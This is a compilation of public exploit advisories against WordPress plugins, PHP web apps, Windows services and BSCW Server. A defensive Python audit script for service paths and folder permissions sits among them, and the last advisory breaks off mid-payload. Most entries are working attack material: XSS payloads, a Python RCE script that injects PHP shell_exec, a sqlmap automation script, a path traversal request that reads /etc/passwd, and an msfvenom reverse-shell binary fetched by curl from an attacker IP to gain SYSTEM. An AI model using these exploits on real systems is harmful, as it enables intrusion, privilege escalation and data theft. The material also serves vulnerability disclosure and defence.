<pre><code># Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)<br /># Date: 3/16/2021<br /># Author: 0xB9<br /># Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/<br /># Version: 1.13.21<br /># Tested on: Windows 10<br /># CVE: CVE-2021-24300<br /><br />1. Description:<br />This plugin is an easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//<br /><br /></code></pre>
<pre><code># Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation<br /># Date: 2021-07-19<br /># Author: Alessandro 'mindsflee' Salzano<br /># Vendor Homepage: https://millegpg.it/<br /># Software Homepage: https://millegpg.it/<br /># Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe<br /># Version: 5.7.2<br /># Tested on: Microsoft Windows 10 Enterprise x64<br /><br />MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".<br /><br />Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.<br /><br />Affected version: MilleGPG5 5.7.2<br /><br /># Details<br /># By default the Authenticated Users group has the modify permission on the MilleGPG5 folders/files, as shown below.<br /># A low privilege account is able to rename the mysqld.exe file located in the bin folder and replace it<br /># with a malicious file that would connect back to an attacking computer, giving system level privileges<br /># (nt authority\system) because the service runs as Local System.<br /># While a low privilege user is unable to restart the service through the application, a restart of the<br /># computer triggers the execution of the malicious file.<br /><br />(1) Impacted services.<br />Any low privileged user can elevate their privileges by abusing these services:<br /><br />C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe<br />C:\Program Files\MilleGPG5\GPGService.exe<br /><br />Details:<br /><br />SERVICE_NAME: MariaDB-GPG<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MariaDB-GPG<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />------<br /><br />SERVICE_NAME: GPGOrchestrator<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> 
BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : GPG Orchestrator<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />(2) Folder permissions.<br />Insecure folder permissions issue:<br /><br />C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)<br /> NT SERVICE\TrustedInstaller:(I)(F)<br /> NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)<br /> NT AUTHORITY\SYSTEM:(I)(F)<br /> NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)<br /> BUILTIN\Administrators:(I)(F)<br /> BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)<br /> BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)<br /> CREATOR OWNER:(I)(OI)(CI)(IO)(F)<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /> ...[SNIP]...<br />---------------<br /><br />C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)<br /> NT SERVICE\TrustedInstaller:(I)(F)<br /> NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)<br /> NT AUTHORITY\SYSTEM:(I)(F)<br /> NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)<br /> BUILTIN\Administrators:(I)(F)<br /> BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)<br /> BUILTIN\Users:(I)(RX)<br /> BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)<br /> CREATOR OWNER:(I)(OI)(CI)(IO)(F)<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /><br /><br /># Proof of Concept<br /><br />1. 
Generate the malicious .exe on the attacking machine<br /> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe<br /><br />2. Set up a listener and ensure Apache is running on the attacking machine<br /> nc -lvp 4242<br /> service apache2 start<br /><br />3. Download the malicious .exe on the victim machine<br /> type in cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"<br /><br />4. Overwrite the file with the malicious .exe.<br /> Rename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe to mysqld.bak<br /> Rename the downloaded 'mysqld_evil.exe' file to mysqld.exe<br /><br />5. Restart the victim machine<br /><br />6. A reverse shell opens on the attacking machine<br /> C:\Windows\system32>whoami<br /> whoami<br /> nt authority\system<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)<br /># Date: 3/16/2021<br /># Author: 0xB9<br /># Software Link: https://wordpress.org/plugins/post-grid/<br /># Version: 2.1.1<br /># Tested on: Windows 10<br /># CVE: CVE-2021-24488<br /><br />1. Description:<br />This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script><br />wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//<br /></code></pre>
<pre><code># Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)<br /># Date: November 30, 2021<br /># Exploit Author: Nicole Daniella Murillo Mejias<br /># Version: Advanced Comment System 1.0<br /># Tested on: Linux<br /><br />#!/usr/bin/env python3<br /><br /># DESCRIPTION:<br /># Commands are Base64 encoded and sent via POST requests to the vulnerable application; the<br /># response is filtered by the randomly generated alphanumeric string and only command output<br /># is displayed.<br />#<br /># USAGE:<br /># Execute the script and pass the command to execute as arguments, they can be quoted or unquoted.<br /># If any special characters are used, they should be quoted with single quotes.<br />#<br /># Example:<br />#<br /># python3 acspoc.py uname -a<br /># python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'<br /><br />import sys<br />import base64<br />import requests<br />import random<br /><br />def generate_string(size):<br />    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"<br />    return ''.join(random.choice(alphabet) for _ in range(size))<br /><br />def exploit(cmd):<br /><br />    # TODO: Change the URL to the target host<br />    url = 'http://127.0.0.1/advanced_comment_system/index.php'<br /><br />    headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br /><br />    encoded_cmd = base64.b64encode(cmd)<br /><br />    # Random marker used to locate the command output in the response<br />    delimiter = generate_string(6).encode()<br /><br />    body = b'ACS_path=php://input%00&cbcmd='<br />    body += encoded_cmd<br />    body += b'&<?php echo " '<br />    body += delimiter<br />    body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'<br /><br />    try:<br />        result = requests.post(url=url, headers=headers, data=body)<br />    except KeyboardInterrupt:<br />        print("Keyboard interrupt detected.")<br />        sys.exit()<br /><br />    if f'{delimiter.decode()}: ' in result.text:<br />        position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")<br /><br />        if len(result.text[position:]) > 0:<br />            print(result.text[position:])<br />        else:<br />            print(f"No output from command '{cmd.decode()}'")<br />    print(f"Response size from target host: {len(result.text)} bytes")<br /><br />if __name__ == "__main__":<br />    exploit(' '.join(sys.argv[1:]).encode())<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)<br /># Date 30.01.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/<br /># Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip<br /># Version: <= 2.0.2<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2015-9323<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md<br /><br />'''<br />Description:<br />The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.<br />'''<br /><br />banner = ''' <br /> <br /> .o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b. <br />d8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D <br />8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY' <br />8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b. <br />Y8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. 
db 8D <br /> `Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P' <br /> <br /> [+] 404 to 301 - SQL-Injection <br /> [@] Developed by Ron Jost (Hacker5preme)<br /> <br />'''<br />print(banner)<br /><br />import argparse<br />import os<br />import requests<br />from datetime import datetime<br />import json<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />my_parser.add_argument('-u', '--USERNAME', type=str)<br />my_parser.add_argument('-p', '--PASSWORD', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br />username = args.USERNAME<br />password = args.PASSWORD<br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /><br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># SQL-Injection (Exploit):<br /><br /># Generate payload for sqlmap<br />print ('[+] 
Payload for sqlmap exploitation:')<br />cookies_session = session.cookies.get_dict()<br />cookie = json.dumps(cookies_session)<br />cookie = cookie.replace('"}','')<br />cookie = cookie.replace('{"', '')<br />cookie = cookie.replace('"', '')<br />cookie = cookie.replace(" ", '')<br />cookie = cookie.replace(":", '=')<br />cookie = cookie.replace(',', '; ')<br /><br />exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'<br />exploit_risk = ' --level 2 --risk 2'<br />exploit_cookie = r' --cookie="' + cookie + r'" '<br /><br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'<br />os.system(exploit_code)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /></code></pre>
<pre><code># Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting<br /># Date: 2021-08-31<br /># Exploit Author: Tushar Jadhav<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html<br /># Version: 1.0<br /># Tested on: Windows 11<br /># Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/<br /># CVE: CVE-2021-40577<br /><br />====================================================================================================<br /><br />Stored Cross-site scripting (XSS):<br /><br />Stored attacks are those where the injected script is permanently stored on<br />the target servers, such as in a database, in a message forum, visitor log, comment field, etc.<br />The victim then retrieves the malicious script from the server when it<br />requests the stored information.<br />Stored XSS is also sometimes referred to as Persistent XSS.<br /><br />====================================================================================================<br /><br />Attack vector:<br /><br />This vulnerability allows the attacker to inject the XSS payload<br />in the User Registration section. Each time the admin or a basic user<br />logs in to the admin panel, the XSS triggers and the attacker is able to steal<br />the cookie according to the crafted payload.<br /><br />====================================================================================================<br /><br />Vulnerable Parameters: Name<br /><br />====================================================================================================<br /><br />Steps for reproducing:<br /><br />1. Go to the add users section.<br />2. Fill in the details and put the <script>alert(document.cookie)</script><br />payload in the Name parameter.<br />3. Once we click on save, we can see the XSS has been triggered.<br /><br />====================================================================================================<br /><br />Request:<br /><br />POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1<br />Host: 192.168.1.205:81<br />Content-Length: 133<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://192.168.1.205:81<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3<br />Connection: close<br /><br />deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=<br /><br />====================================================================================================<br /></code></pre>
<pre><code># Exploit Title: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path<br /># Discovery by: Angel Canseco<br /># Discovery Date: 2022-01-16<br /># Software Link: https://www.contpaqi.com/descargas<br /># Tested Version: 14.0.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 English<br /># Steps to discover the Unquoted Service Path:<br /><br />C:\Users\test>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i "AppKeyLicenseServer_CONTPAQi"<br /><br />Servidor de Licencias CONTPAQi® AppKeyLicenseServer_CONTPAQi C:\Program Files (x86)\Compac\Servidor de Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe Auto<br /><br />C:\Users\test>sc qc "AppKeyLicenseServer_CONTPAQi"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: AppKeyLicenseServer_CONTPAQi<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Compac\Servidor de Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Servidor de Licencias CONTPAQi®<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /># Exploit:<br /><br />A successful attempt would cause the local user to be able to insert their<br />code in the system root path undetected by the OS or other security<br />applications and elevate their privileges after a reboot.<br /></code></pre>
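The two Windows findings above, the MilleGPG5 service directories writable by BUILTIN\Users and the unquoted CONTPAQi image path, are both visible in plain `sc qc` and `icacls` output. The following Python audit is an added example, not code from either advisory; the service name, vendor folder and ACL text it parses are constructed stand-ins for the output shown on the page.

```python
"""Audit two service-hardening properties visible in the MilleGPG5 and CONTPAQi
advisories above: an unquoted image path containing spaces, and a service directory
writable by low-privileged principals while the service runs as LocalSystem.
Added example; the inputs are the text of `sc qc` and `icacls` output."""
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample output modelled on the advisories; vendor, service and paths are placeholders.
SC_QC_SAMPLE = r"""SERVICE_NAME: ExampleLicenseServer
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Example Vendor\License
Server\LicenseServer.exe
        SERVICE_START_NAME : LocalSystem
"""
ICACLS_SAMPLE = r"""C:\Program Files\ExampleApp\bin BUILTIN\Users:(I)(OI)(CI)(F)
                                NT AUTHORITY\SYSTEM:(I)(F)
                                BUILTIN\Administrators:(I)(F)
                                BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
"""

# icacls rights (simple and specific) that let a principal replace or alter files.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WEA", "WA", "DC", "WDAC", "WO"}
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
                       "Everyone", "NT AUTHORITY\\INTERACTIVE"}
_FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")
_ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^()]*\))+)\s*$")


class Ace(NamedTuple):
    principal: str
    rights: frozenset


def parse_sc_qc(output: str) -> Dict[str, str]:
    """Map `sc qc` fields to values. A line without a KEY : prefix continues the previous
    field, which is how the wrapped BINARY_PATH_NAME seen in the advisories is recovered."""
    fields: Dict[str, str] = {}
    last = None
    for line in output.splitlines():
        m = _FIELD_RE.match(line)
        if m:
            last = m.group(1)
            fields[last] = m.group(2)
        elif last and line.strip():
            fields[last] = f"{fields[last]} {line.strip()}"
    return fields


def is_unquoted_with_spaces(binary_path: str) -> bool:
    """True when the image path is unquoted and the executable part contains a space; the
    service controller then tries each space-delimited prefix as the program name first,
    which is why such a path must be quoted."""
    path = binary_path.strip()
    if path.startswith('"'):
        return False
    executable = re.split(r"(?i)\.exe\b", path, maxsplit=1)[0]
    return " " in executable


def quote_binary_path(binary_path: str) -> str:
    """Remediation value for `sc config NAME binPath=`: quote the executable, keep arguments."""
    path = binary_path.strip()
    m = re.match(r"(?i)^(?P<exe>.+?\.exe)(?P<args>.*)$", path)
    if path.startswith('"') or not m:
        return path
    return f'"{m.group("exe")}"{m.group("args")}'


def parse_icacls(output: str, path: str) -> List[Ace]:
    """Parse `icacls PATH` output. The first line starts with the queried path, which is
    stripped explicitly because both paths and principals may contain spaces."""
    aces: List[Ace] = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = _ACE_RE.match(line)
        if not m:
            continue
        flags = re.findall(r"\(([^()]*)\)", m.group("flags"))
        aces.append(Ace(m.group("principal"),
                        frozenset(r.strip() for f in flags for r in f.split(","))))
    return aces


def writable_by_low_priv(aces: List[Ace]) -> List[Tuple[str, List[str]]]:
    """Low-privilege principals holding any write-capable right; inherit-only ACEs count
    because they apply to the files inside the directory."""
    return [(a.principal, sorted(a.rights & WRITE_RIGHTS))
            for a in aces if a.principal in LOW_PRIV_PRINCIPALS and a.rights & WRITE_RIGHTS]


def audit_service(sc_output: str, icacls_output: str, service_dir: str) -> List[str]:
    """Combine both checks into human-readable findings."""
    cfg = parse_sc_qc(sc_output)
    image, account = cfg.get("BINARY_PATH_NAME", ""), cfg.get("SERVICE_START_NAME", "unknown")
    findings: List[str] = []
    if is_unquoted_with_spaces(image):
        findings.append(f"unquoted image path: {image} -> fix: {quote_binary_path(image)}")
    for principal, rights in writable_by_low_priv(parse_icacls(icacls_output, service_dir)):
        findings.append(f"{service_dir} writable by {principal} ({','.join(rights)}) "
                        f"while the service runs as {account}")
    return findings


if __name__ == "__main__":
    for finding in audit_service(SC_QC_SAMPLE, ICACLS_SAMPLE, r"C:\Program Files\ExampleApp\bin"):
        print(finding)
```

Quoting the path with `sc config NAME binPath= "..."` closes the first finding; the second needs the directory ACL tightened so that only SYSTEM and Administrators hold write rights over a LocalSystem service's binaries.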
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211202-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities in BSCW Server<br /> product: OrbiTeam BSCW Server<br /> vulnerable version: BSCW Server 5.0.x, 5.1.x, <=5.2.4, <=7.3.x, <=7.4.3<br /> fixed version: 5.2.5, 7.4.4<br /> CVE number: requested/pending<br /> impact: Critical<br /> homepage: https://www.bscw.de/<br /> found: 2021-09-05<br /> by: Armin Stock (Atos ODS)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"BSCW Classic is in use around the world. With more than 500 functions, it<br />offers the right solution for every task. Turn your ideas into reality! Our<br />proven system has been supporting information flow and knowledge management at<br />numerous companies for more than 20 years."<br /><br />Source: OrbiTeam - BSCW Server: https://www.bscw.de/en/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version for the affected products which should<br />be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated path traversal allows access to local files<br /><br />The operation `addtempl` does allow a user to add files from a template<br />directory on the server. It accepts the parameter `template`, which is used to<br />create the path of the file. The only security mechanism to prevent a path<br />traversal attack is `template.replace("../", "")`. 
This can easily be bypassed by specifying a value like `....//`, which the<br />single replacement turns back into `../`.<br /><br /><br />2) Authenticated wormable stored XSS<br /><br />The operation `chbanner` allows a user to change the banner of some objects.<br />The banner data supports several text formats.<br /><br />-------------------------------------------------------------------------------<br /># File: bscw/core/bs_txtformat.py<br />format_text = 1<br />format_textpre = 2<br />format_html = 4<br />format_bbcode = 8<br />format_wiki = 16<br />-------------------------------------------------------------------------------<br /><br />Using the format `textpre` (value 2) allows the user to include a limited set of HTML<br />tags in the banner.<br /><br />Validation of the provided data is as follows:<br />* Use the `Python` module `HTMLParser.HTMLParser` to parse the provided data<br />* Override `handle_starttag`<br />* check that the tag is in `ValidElements`<br />* check that attribute names do not start with `on`<br />* check that the value of the `href` attribute does not start with `javascript:`<br /><br />One way to exploit this behavior and perform an XSS attack is to reuse<br />the Dojo Toolkit (https://dojotoolkit.org) and the available types.<br /><br /><br />3) Multiple HTTP header attacks<br /><br />The operation `login` accepts the query parameter `returnto`. 
The value of<br />this parameter is later used as the value of the HTTP response header `Location`.<br />As the value is neither validated nor encoded, it is possible to perform several<br />attacks:<br /><br />* Open redirect<br />* HTTP header injection<br /><br /><br />4) Session object manipulation allows to bypass entering the password for<br />admin actions<br /><br />The BSCW server has a check to validate that a user is an actual admin, which<br />can be summarized as:<br /><br />* Is the username in the configured `SERVER_ADMINS` array<br />* Is the remote IP in the configured allow-list<br />* Does the session object have a key `is_admin`<br /><br />To fulfill the third requirement, the normal way is to call the operation<br />`admin` and enter the user password.<br /><br />An attacker with access to an admin session (maybe via XSS) can bypass this<br />step by using any operation based on the `bscw.core.cl_input.InputBase` class.<br />This class verifies `POST` requests and the incoming data. If there is something<br />wrong, it saves the provided data in the `session` object and redirects the<br />user to the current page. The key used to store the provided data in<br />the `session` object is the value of the parameter `session`. This allows an<br />attacker to set a non-empty value for the `is_admin` key and fulfill the third<br />requirement of the `is_admin` function.<br /><br /><br />5) Unauthenticated LFI<br /><br />The operation `theme` is vulnerable to a local file inclusion attack. It<br />accepts the query parameter `style_name`, which is used to locate a file and<br />serve the content. 
As the parameter is not validated and no restriction is<br />enforced to serve only files from specific directories, it is possible to read<br />arbitrary files.<br /><br />There is one restriction on which files can be accessed, as the content of the<br />file is used as a format string with the `%` operator.<br /><br /><br />6) Unauthenticated reflected XSS - refresh<br /><br />The operation `refresh` allows setting arbitrary attributes on the `response`<br />object. The `response` object is later used to create the actual HTTP response.<br /><br />Important `response` object attributes:<br />* `_type` - e.g. `location` for redirection, `body` to send the `body`<br />attribute as the HTTP body, `file` to serve a local file<br />* `body` - content sent as the HTTP body if `_type` == `body`<br />* `mimetype` - used for the value of the HTTP header `Content-Type`, can also<br />be used for HTTP header injection<br /><br /><br />7) Unauthenticated reflected XSS - upload_browser<br /><br />The operation `upload_browser` accepts the query parameter `CKEditorFuncNum`,<br />which is reflected in the response. As the value is used inside an existing<br />`script` block, it is possible to inject arbitrary `JavaScript` code.<br /><br /><br />8) Unauthenticated user enumeration<br /><br />It is possible to enumerate all usernames registered on the BSCW server. This<br />information can later be used for password-based attacks.<br /><br />If the verification of the session token fails, an error message is shown to the<br />user saying that they need to re-authenticate. 
This message does contain the username<br />if the provided `USERID` is valid.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated path traversal allows access to local files<br /><br />This allows an attacker to add any file from the server's filesystem to its own<br />folder and download the content afterwards.<br /><br />-------------------------------------------------------------------------------<br />POST /sec/bscw.cgi/209?op=_addtempl HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: curl/1.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 174<br />Origin: http://bscw.local:8080<br />DNT: 1<br />Connection: keep-alive<br />Referer: http://bscw.local:8080/sec/bscw.cgi/209?op=addtempl<br />Cookie: MicroblogInboxIndicatorState=%5B0%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; _sec_bscws="3237cc7f0956a03651500ee5e3254a01:51"; <br />bscw_auth="XPN8djYx/kdqb4t8KopuYS+KkgMzTthB:33"<br />Upgrade-Insecure-Requests: 1<br /><br />op=addtempl&bscw_v_post=JoyUiupaaP5QtTJUse%2BD3Vp2IVtkwoTthB&template=....//....//....//....//....//....//....//....//....//....//etc/passwd&name=hello_pwd&description=&_ok_a=+++OK+++<br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br />GET /sec/bscw.cgi/d2748/hello_pwd HTTP/1.1<br />....<br /><br />Response:<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 08 Sep 2021 11:44:10 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Expires: Wed, 08 Sep 2021 09:44:10 GMT<br />Last-Modified: Wed, 08 Sep 2021 11:43:52 GMT<br />Etag: "2750.1631101432.958828"<br />Content-Length: 1049<br />Content-Type: application/octet-stream<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br /><br 
/>root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />_apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br />openldap:x:101:102:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br />bscw:x:999:999:BSCW system user:/opt/bscw:/bin/bash<br />-------------------------------------------------------------------------------<br /><br /><br />2) Authenticated wormable stored XSS<br /><br />The following banner code:<br />-------------------------------------------------------------------------------<br /><P>hello <div data-dojo-type="dojobscw.operations.HoverToolbarButton"<br />data-dojo-props="onClick: 